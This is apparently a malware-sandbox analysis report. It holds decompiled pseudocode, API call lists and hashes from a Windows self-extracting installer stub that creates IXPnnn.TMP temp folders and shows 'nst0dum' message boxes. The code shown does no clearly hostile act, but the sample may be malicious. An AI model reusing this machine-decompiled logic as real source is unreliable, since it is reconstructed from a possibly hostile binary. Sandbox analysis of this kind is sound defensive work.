                                                                                                                                                                                                    													}
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												goto L47;
                                                                                                                                                                                                    												L42:
                                                                                                                                                                                                    												__eflags = _t60 - 0x5a;
                                                                                                                                                                                                    											} while (_t60 <= 0x5a);
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										goto L43;
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										_t101 = 1;
                                                                                                                                                                                                    										_t69 = E00175467(0x1791e4, 1, 3); // executed
                                                                                                                                                                                                    										__eflags = _t69;
                                                                                                                                                                                                    										if(_t69 != 0) {
                                                                                                                                                                                                    											goto L45;
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											_t82 = 0x1791e4;
                                                                                                                                                                                                    											_t70 = E00172630(0, 0x1791e4, 1);
                                                                                                                                                                                                    											__eflags = _t70;
                                                                                                                                                                                                    											if(_t70 != 0) {
                                                                                                                                                                                                    												goto L19;
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												_t101 = 1;
                                                                                                                                                                                                    												_t82 = 0x1791e4;
                                                                                                                                                                                                    												_t71 = E00175467(0x1791e4, 1, 1);
                                                                                                                                                                                                    												__eflags = _t71;
                                                                                                                                                                                                    												if(_t71 != 0) {
                                                                                                                                                                                                    													goto L45;
                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                    													do {
                                                                                                                                                                                                    														goto L19;
                                                                                                                                                                                                    														L43:
                                                                                                                                                                                                    														GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                    														_push(4);
                                                                                                                                                                                                    														_t101 = 3;
                                                                                                                                                                                                    														_t82 =  &_v268;
                                                                                                                                                                                                    														_t44 = E0017597D(_t82, _t101, 1);
                                                                                                                                                                                                    														__eflags = _t44;
                                                                                                                                                                                                    													} while (_t44 != 0);
                                                                                                                                                                                                    													goto L2;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							__eflags = _t35 - 0x5c;
                                                                                                                                                                                                    							if(_t35 != 0x5c) {
                                                                                                                                                                                                    								L10:
                                                                                                                                                                                                    								_t72 = 1;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								__eflags =  *0x178b3f - _t35; // 0x0
                                                                                                                                                                                                    								_t72 = 0;
                                                                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                                                                    									goto L10;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t101 = 0;
                                                                                                                                                                                                    							_t73 = E00175467(0x178b3e, 0, _t72);
                                                                                                                                                                                                    							__eflags = _t73;
                                                                                                                                                                                                    							if(_t73 != 0) {
                                                                                                                                                                                                    								L45:
                                                                                                                                                                                                    								_t38 = 1;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t101 = 0x4be;
                                                                                                                                                                                                    								E001744B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                                                                                                                                                    								goto L2;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t101 = 0x4b1;
                                                                                                                                                                                                    						E001744B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                    						LocalFree(_t109);
                                                                                                                                                                                                    						 *0x179124 = 0x80070714;
                                                                                                                                                                                                    						goto L2;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t101 = 0x4b5;
                                                                                                                                                                                                    					E001744B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                    					 *0x179124 = E00176285();
                                                                                                                                                                                                    					L2:
                                                                                                                                                                                                    					_t38 = 0;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				L47:
                                                                                                                                                                                                    				return E00176CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                                                                                                                                                    			}
                                                                                                                                                                                                    0x001755ab
                                                                                                                                                                                                    0x001755b2
                                                                                                                                                                                                    0x001755c9
                                                                                                                                                                                                    0x001755d5
                                                                                                                                                                                                    0x001755d9
                                                                                                                                                                                                    0x00175600
                                                                                                                                                                                                    0x00175605
                                                                                                                                                                                                    0x0017560a
                                                                                                                                                                                                    0x0017560c
                                                                                                                                                                                                    0x00175638
                                                                                                                                                                                                    0x00175641
                                                                                                                                                                                                    0x00175643
                                                                                                                                                                                                    0x00175645
                                                                                                                                                                                                    0x00175645
                                                                                                                                                                                                    0x0017564c
                                                                                                                                                                                                    0x00175652
                                                                                                                                                                                                    0x00175657
                                                                                                                                                                                                    0x00175659
                                                                                                                                                                                                    0x00175696
                                                                                                                                                                                                    0x0017569c
                                                                                                                                                                                                    0x0017589f
                                                                                                                                                                                                    0x001758a7
                                                                                                                                                                                                    0x001758ac
                                                                                                                                                                                                    0x001758b3
                                                                                                                                                                                                    0x001758b5
                                                                                                                                                                                                    0x001756a2
0x001756a2, 0x001756a8, 0x00000000, 0x001756ae, 0x001756ae, 0x001756b9, 0x001756bf, 0x001756c1, 0x001756f3, 0x001756f3
0x00175705, 0x0017570a, 0x00175711, 0x00175717, 0x00175724, 0x00175726, 0x00175729, 0x00175730, 0x00175737, 0x0017573d
0x00175740, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0017572b, 0x0017572b, 0x0017572e, 0x00175742, 0x00175742
0x00175745, 0x0017576b, 0x0017576b, 0x00000000, 0x00175747, 0x00175747, 0x0017574d, 0x0017574f, 0x00175771, 0x00175771
0x00175773, 0x00000000, 0x00175751, 0x00175751, 0x00175753, 0x00000000, 0x00175755, 0x0017575b, 0x00175760, 0x00175762
0x00000000, 0x00175764, 0x00175764, 0x00175769, 0x0017577e, 0x0017577e, 0x00175781, 0x00175788, 0x0017578d, 0x0017578f
0x001757b2, 0x001757b8, 0x001757bd, 0x001757bf, 0x001757cd, 0x001757cd, 0x001757dd, 0x001757e3, 0x001757ef, 0x001757f5
0x001757f8, 0x0017580a, 0x0017580a, 0x001757fa, 0x00175802, 0x00175802, 0x0017580d, 0x0017580f, 0x00175830, 0x00175836
0x0017583d, 0x0017584b, 0x00175851, 0x00175855, 0x0017585a, 0x0017585c, 0x00000000, 0x0017585e, 0x0017585e, 0x00000000
0x0017585e, 0x00175811, 0x00175817, 0x00175819, 0x0017581f, 0x00000000, 0x0017581f, 0x00175791, 0x00175797, 0x0017579c
0x0017579e, 0x00000000, 0x001757a0, 0x001757a9, 0x001757ae, 0x001757b0, 0x00000000, 0x00000000, 0x00000000, 0x00000000
0x001757b0, 0x0017579e, 0x00000000, 0x00000000, 0x00000000, 0x00175769, 0x00175762, 0x00175753, 0x0017574f, 0x00000000
0x00000000, 0x00000000, 0x0017572e, 0x00000000, 0x00175864, 0x00175864, 0x00175864, 0x00175717, 0x00000000, 0x001756c3
0x001756c5, 0x001756c9, 0x001756ce, 0x001756d0, 0x00000000, 0x001756d6, 0x001756d6, 0x001756d8, 0x001756dd, 0x001756df
0x00000000, 0x001756e1, 0x001756e2, 0x001756e4, 0x001756e6, 0x001756eb, 0x001756ed, 0x00000000, 0x001756f3, 0x001756f3
0x00000000, 0x0017586c, 0x00175878, 0x0017587e, 0x00175882, 0x00175883, 0x00175889, 0x0017588e, 0x0017588e, 0x00000000
0x00175896, 0x001756ed, 0x001756df, 0x001756d0, 0x001756c1, 0x001756a8, 0x0017565b, 0x0017565b, 0x0017565d, 0x00175669
0x00175669, 0x0017565f, 0x0017565f, 0x00175665, 0x00175667
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175667
                                                                                                                                                                                                    0x0017566c
                                                                                                                                                                                                    0x00175673
                                                                                                                                                                                                    0x00175678
                                                                                                                                                                                                    0x0017567a
                                                                                                                                                                                                    0x0017589b
                                                                                                                                                                                                    0x0017589b
                                                                                                                                                                                                    0x00175680
                                                                                                                                                                                                    0x00175685
                                                                                                                                                                                                    0x0017568c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017568c
                                                                                                                                                                                                    0x0017567a
                                                                                                                                                                                                    0x0017560e
                                                                                                                                                                                                    0x00175613
                                                                                                                                                                                                    0x0017561a
                                                                                                                                                                                                    0x00175620
                                                                                                                                                                                                    0x00175626
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175626
                                                                                                                                                                                                    0x001755db
                                                                                                                                                                                                    0x001755e0
                                                                                                                                                                                                    0x001755e7
                                                                                                                                                                                                    0x001755f1
                                                                                                                                                                                                    0x001755f6
                                                                                                                                                                                                    0x001755f6
                                                                                                                                                                                                    0x001755f6
                                                                                                                                                                                                    0x001758b7
                                                                                                                                                                                                    0x001758c7

APIs
  • Part of subcall function 0017468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001746A0
  • Part of subcall function 0017468F: SizeofResource.KERNEL32(00000000,00000000,?,00172D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001746A9
  • Part of subcall function 0017468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001746C3
  • Part of subcall function 0017468F: LoadResource.KERNEL32(00000000,00000000,?,00172D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001746CC
  • Part of subcall function 0017468F: LockResource.KERNEL32(00000000,?,00172D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001746D3
  • Part of subcall function 0017468F: memcpy_s.MSVCRT ref: 001746E5
  • Part of subcall function 0017468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001746EF
• LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 001755CF
• lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00175638
• LocalFree.KERNEL32(00000000), ref: 0017564C
• LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00175620
  • Part of subcall function 001744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00174518
  • Part of subcall function 001744B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00174554
  • Part of subcall function 00176285: GetLastError.KERNEL32(00175BBC), ref: 00176285
• GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 001756B9
• GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 0017571E
• GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00175737
• GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 001757CD
• GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 001757EF
• CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00175802
  • Part of subcall function 00172630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00172654
• SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00175830
  • Part of subcall function 00176517: FindResourceA.KERNEL32(00170000,000007D6,00000005), ref: 0017652A
  • Part of subcall function 00176517: LoadResource.KERNEL32(00170000,00000000,?,?,00172EE8,00000000,001719E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00176538
  • Part of subcall function 00176517: DialogBoxIndirectParamA.USER32(00170000,00000000,00000547,001719E0,00000000), ref: 00176557
  • Part of subcall function 00176517: FreeResource.KERNEL32(00000000,?,?,00172EE8,00000000,001719E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00176560
• GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00175878
  • Part of subcall function 0017597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 001759A8
  • Part of subcall function 0017597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 001759AF
Strings
Memory Dump Source
• Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_170000_file.jbxd
Similarity
• API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
• String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
• API String ID: 2436801531-3855382519
• Opcode ID: b4e859a15d435b28b4742e134f8d80320600fa9f307c041ebb573654bc2e632f
• Instruction ID: 243ca43526e49a13c460222f72841225da3dd8fccc8a6f2830100483d3ff1e9e
• Opcode Fuzzy Hash: b4e859a15d435b28b4742e134f8d80320600fa9f307c041ebb573654bc2e632f
• Instruction Fuzzy Hash: B3812B71A04A049BDB24AB758C45BEE777F9F60300F8484A5F58ED2591EFF08EC58A61
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
C-Code - Quality: 94%
			E001744B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
				signed int _v8;
				char _v64;
				char _v576;
				void* _v580;
				struct HWND__* _v584;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				void* _t37;
				signed int _t39;
				intOrPtr _t43;
				signed int _t44;
				signed int _t49;
				signed int _t52;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t58;
				intOrPtr _t59;
				int _t64;
				void* _t66;
				intOrPtr* _t67;
				signed int _t69;
				intOrPtr* _t73;
				intOrPtr* _t76;
				intOrPtr* _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				intOrPtr* _t84;
				void* _t85;
				signed int _t89;

				_t75 = __edx;
				_t34 =  *0x178004; // 0x4ffa21aa
				_v8 = _t34 ^ _t89;
				_v584 = __ecx;
				_t83 = "LoadString() Error.  Could not load string resource.";
				_t67 = _a4;
				_t69 = 0xd;
				_t37 = memcpy( &_v64, _t83, _t69 << 2);
				_t80 = _t83 + _t69 + _t69;
				_v580 = _t37;
                                                                                                                                                                                                    				asm("movsb");
                                                                                                                                                                                                    				if(( *0x178a38 & 0x00000001) != 0) {
                                                                                                                                                                                                    					_t39 = 1;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_v576 = 0;
                                                                                                                                                                                                    					LoadStringA( *0x179a3c, _t75,  &_v576, 0x200);
                                                                                                                                                                                                    					if(_v576 != 0) {
                                                                                                                                                                                                    						_t73 =  &_v576;
                                                                                                                                                                                                    						_t16 = _t73 + 1; // 0x1
                                                                                                                                                                                                    						_t75 = _t16;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t43 =  *_t73;
                                                                                                                                                                                                    							_t73 = _t73 + 1;
                                                                                                                                                                                                    						} while (_t43 != 0);
                                                                                                                                                                                                    						_t84 = _v580;
                                                                                                                                                                                                    						_t74 = _t73 - _t75;
                                                                                                                                                                                                    						if(_t84 == 0) {
                                                                                                                                                                                                    							if(_t67 == 0) {
                                                                                                                                                                                                    								_t27 = _t74 + 1; // 0x2
                                                                                                                                                                                                    								_t83 = _t27;
                                                                                                                                                                                                    								_t44 = LocalAlloc(0x40, _t83);
                                                                                                                                                                                                    								_t80 = _t44;
                                                                                                                                                                                                    								if(_t80 == 0) {
                                                                                                                                                                                                    									goto L6;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_t75 = _t83;
                                                                                                                                                                                                    									_t74 = _t80;
                                                                                                                                                                                                    									E00171680(_t80, _t83,  &_v576);
                                                                                                                                                                                                    									goto L23;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t76 = _t67;
                                                                                                                                                                                                    								_t24 = _t76 + 1; // 0x1
                                                                                                                                                                                                    								_t85 = _t24;
                                                                                                                                                                                                    								do {
                                                                                                                                                                                                    									_t55 =  *_t76;
                                                                                                                                                                                                    									_t76 = _t76 + 1;
                                                                                                                                                                                                    								} while (_t55 != 0);
                                                                                                                                                                                                    								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                                                                                                                                                    								_t83 = _t25 + _t74;
                                                                                                                                                                                                    								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                                                                                                                                                    								_t80 = _t44;
                                                                                                                                                                                                    								if(_t80 == 0) {
                                                                                                                                                                                                    									goto L6;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									E0017171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                    									goto L23;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t77 = _t67;
                                                                                                                                                                                                    							_t18 = _t77 + 1; // 0x1
                                                                                                                                                                                                    							_t81 = _t18;
                                                                                                                                                                                                    							do {
                                                                                                                                                                                                    								_t58 =  *_t77;
                                                                                                                                                                                                    								_t77 = _t77 + 1;
                                                                                                                                                                                                    							} while (_t58 != 0);
                                                                                                                                                                                                    							_t75 = _t77 - _t81;
                                                                                                                                                                                                    							_t82 = _t84 + 1;
                                                                                                                                                                                                    							do {
                                                                                                                                                                                                    								_t59 =  *_t84;
                                                                                                                                                                                                    								_t84 = _t84 + 1;
                                                                                                                                                                                                    							} while (_t59 != 0);
                                                                                                                                                                                                    							_t21 = _t74 + 0x64; // 0x65
                                                                                                                                                                                                    							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                                                                                                                                                    							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                                                                                                                                                    							_t80 = _t44;
                                                                                                                                                                                                    							if(_t80 == 0) {
                                                                                                                                                                                                    								goto L6;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_push(_v580);
                                                                                                                                                                                                    								E0017171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                    								L23:
                                                                                                                                                                                                    								MessageBeep(_a12);
                                                                                                                                                                                                    								if(E0017681F(_t67) == 0) {
                                                                                                                                                                                                    									L25:
                                                                                                                                                                                                    									_t49 = 0x10000;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_t54 = E001767C9(_t74, _t74);
                                                                                                                                                                                                    									_t49 = 0x190000;
                                                                                                                                                                                                    									if(_t54 == 0) {
                                                                                                                                                                                                    										goto L25;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t52 = MessageBoxA(_v584, _t80, "nst0dum", _t49 | _a12 | _a16); // executed
                                                                                                                                                                                                    								_t83 = _t52;
                                                                                                                                                                                                    								LocalFree(_t80);
                                                                                                                                                                                                    								_t39 = _t52;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						if(E0017681F(_t67) == 0) {
                                                                                                                                                                                                    							L4:
                                                                                                                                                                                                    							_t64 = 0x10010;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t66 = E001767C9(0, 0);
                                                                                                                                                                                                    							_t64 = 0x190010;
                                                                                                                                                                                                    							if(_t66 == 0) {
                                                                                                                                                                                                    								goto L4;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t44 = MessageBoxA(_v584,  &_v64, "nst0dum", _t64);
                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                    						_t39 = _t44 | 0xffffffff;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00176CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                                                                                                                                                    			}
0x001744b9 0x001744c4 0x001744cb 0x001744d8 0x001744e4 0x001744eb 0x001744ee 0x001744ef 0x001744ef 0x001744f1 0x001744f7 0x001744f8 0x0017467b 0x001744fe 0x00174509 0x00174518 0x00174525 0x00174562 0x00174568 0x00174568 0x0017456b 0x0017456b 0x0017456d 0x0017456e 0x00174572 0x00174578 0x0017457c 0x001745cb 0x00174607 0x00174607 0x0017460d 0x00174613 0x00174617 0x00000000 0x0017461d 0x00174623 0x00174626 0x00174628 0x00000000 0x00174628
                                                                                                                                                                                                    0x001745cd
                                                                                                                                                                                                    0x001745cd
                                                                                                                                                                                                    0x001745cf
                                                                                                                                                                                                    0x001745cf
                                                                                                                                                                                                    0x001745d2
                                                                                                                                                                                                    0x001745d2
                                                                                                                                                                                                    0x001745d4
                                                                                                                                                                                                    0x001745d5
                                                                                                                                                                                                    0x001745db
                                                                                                                                                                                                    0x001745de
                                                                                                                                                                                                    0x001745e3
                                                                                                                                                                                                    0x001745e9
                                                                                                                                                                                                    0x001745ed
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001745f3
                                                                                                                                                                                                    0x001745fd
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00174602
                                                                                                                                                                                                    0x001745ed
                                                                                                                                                                                                    0x0017457e
                                                                                                                                                                                                    0x0017457e
                                                                                                                                                                                                    0x00174580
                                                                                                                                                                                                    0x00174580
                                                                                                                                                                                                    0x00174583
                                                                                                                                                                                                    0x00174583
                                                                                                                                                                                                    0x00174585
                                                                                                                                                                                                    0x00174586
                                                                                                                                                                                                    0x0017458a
                                                                                                                                                                                                    0x0017458c
                                                                                                                                                                                                    0x0017458f
                                                                                                                                                                                                    0x0017458f
                                                                                                                                                                                                    0x00174591
                                                                                                                                                                                                    0x00174592
                                                                                                                                                                                                    0x0017459b
                                                                                                                                                                                                    0x0017459e
                                                                                                                                                                                                    0x001745a3
                                                                                                                                                                                                    0x001745a9
                                                                                                                                                                                                    0x001745ad
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001745af
                                                                                                                                                                                                    0x001745af
                                                                                                                                                                                                    0x001745bf
                                                                                                                                                                                                    0x0017462d
                                                                                                                                                                                                    0x00174630
                                                                                                                                                                                                    0x0017463d
                                                                                                                                                                                                    0x0017464e
                                                                                                                                                                                                    0x0017464e
                                                                                                                                                                                                    0x0017463f
                                                                                                                                                                                                    0x00174640
                                                                                                                                                                                                    0x00174647
                                                                                                                                                                                                    0x0017464c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017464c
                                                                                                                                                                                                    0x00174666
                                                                                                                                                                                                    0x0017466d
                                                                                                                                                                                                    0x0017466f
                                                                                                                                                                                                    0x00174675
                                                                                                                                                                                                    0x00174675
                                                                                                                                                                                                    0x001745ad
                                                                                                                                                                                                    0x00174527
                                                                                                                                                                                                    0x0017452e
                                                                                                                                                                                                    0x0017453f
                                                                                                                                                                                                    0x0017453f
                                                                                                                                                                                                    0x00174530
                                                                                                                                                                                                    0x00174531
                                                                                                                                                                                                    0x00174538
                                                                                                                                                                                                    0x0017453d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017453d
                                                                                                                                                                                                    0x00174554
                                                                                                                                                                                                    0x0017455a
                                                                                                                                                                                                    0x0017455a
                                                                                                                                                                                                    0x0017455a
                                                                                                                                                                                                    0x00174525
                                                                                                                                                                                                    0x0017468c

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00174518
                                                                                                                                                                                                    • MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00174554
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000065), ref: 001745A3
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000065), ref: 001745E3
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000002), ref: 0017460D
                                                                                                                                                                                                    • MessageBeep.USER32(00000000), ref: 00174630
                                                                                                                                                                                                    • MessageBoxA.USER32(?,00000000,nst0dum,00000000), ref: 00174666
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 0017466F
                                                                                                                                                                                                      • Part of subcall function 0017681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0017686E
                                                                                                                                                                                                      • Part of subcall function 0017681F: GetSystemMetrics.USER32(0000004A), ref: 001768A7
                                                                                                                                                                                                      • Part of subcall function 0017681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 001768CC
                                                                                                                                                                                                      • Part of subcall function 0017681F: RegQueryValueExA.ADVAPI32(?,00171140,00000000,?,?,0000000C), ref: 001768F4
                                                                                                                                                                                                      • Part of subcall function 0017681F: RegCloseKey.ADVAPI32(?), ref: 00176902
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                    • String ID: LoadString() Error. Could not load string resource.$nst0dum
                                                                                                                                                                                                    • API String ID: 3244514340-614204707
                                                                                                                                                                                                    • Opcode ID: a318399fc75832fb78ed41de0fb496638d0acc614c822d8c67be696c81c430b3
                                                                                                                                                                                                    • Instruction ID: f85875308435524c619868a2aee80910e45f5bb8b3e7a0968fe232b0bcef92ac
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a318399fc75832fb78ed41de0fb496638d0acc614c822d8c67be696c81c430b3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA51F372900219ABDB219F28CC48BBABB79EF85300F148194FD5DA7241DB71DE85CBA0
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 95%
                                                                                                                                                                                                    			E001753A1(CHAR* __ecx, CHAR* __edx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t5;
                                                                                                                                                                                                    				long _t13;
                                                                                                                                                                                                    				int _t14;
                                                                                                                                                                                                    				CHAR* _t20;
                                                                                                                                                                                                    				int _t29;
                                                                                                                                                                                                    				int _t30;
                                                                                                                                                                                                    				CHAR* _t32;
				signed int _t33;
				void* _t34;

				_t5 =  *0x178004; // 0x4ffa21aa  (/GS security cookie)
				_v8 = _t5 ^ _t33; // stack cookie = global cookie XOR frame pointer
				_t32 = __edx; // output buffer receiving the chosen directory path
				_t20 = __ecx; // base (temp) directory, see GetTempFileNameA below
				_t29 = 0;
				// Probe IXP000.TMP, IXP001.TMP, ... (up to 0x190 = 400 names) under the
				// base directory until a name that does not yet exist is found.
				// The IXP%03d.TMP naming is the temp-directory scheme of a self-extracting stub.
				while(1) {
					E0017171E( &_v268, 0x104, "IXP%03d.TMP", _t29); // formats the name (wraps _vsnprintf)
					_t34 = _t34 + 0x10;
					_t29 = _t29 + 1;
					E00171680(_t32, 0x104, _t20); // inferred: copy base directory into the buffer
					E0017658A(_t32, 0x104,  &_v268); // executed; inferred: append IXP%03d.TMP
					RemoveDirectoryA(_t32); // executed; drops a leftover empty directory of that name
					_t13 = GetFileAttributesA(_t32); // executed
					if(_t13 == 0xffffffff) {
						break; // INVALID_FILE_ATTRIBUTES: path is free, try to create it below
					}
					if(_t29 < 0x190) {
						continue;
					}
					L3:
					// Fallback when all 400 names are taken or CreateDirectoryA failed:
					// let the system pick a unique IXP*.tmp name instead.
					_t30 = 0;
					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
						_t30 = 1;
						DeleteFileA(_t32); // GetTempFileNameA created a file; replace it with a directory
						CreateDirectoryA(_t32, 0);
					}
					L5:
					return E00176CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32); // cookie check, returns success flag
				}
				_t14 = CreateDirectoryA(_t32, 0); // executed
				if(_t14 == 0) {
					goto L3;
				}
				_t30 = 1;
				 *0x178a20 = 1; // global flag: a numbered IXPnnn.TMP directory was created
				goto L5;
			}

APIs
  • Part of subcall function 0017171E: _vsnprintf.MSVCRT ref: 00171750
• RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 001753FB
• GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00175402
• GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0017541F
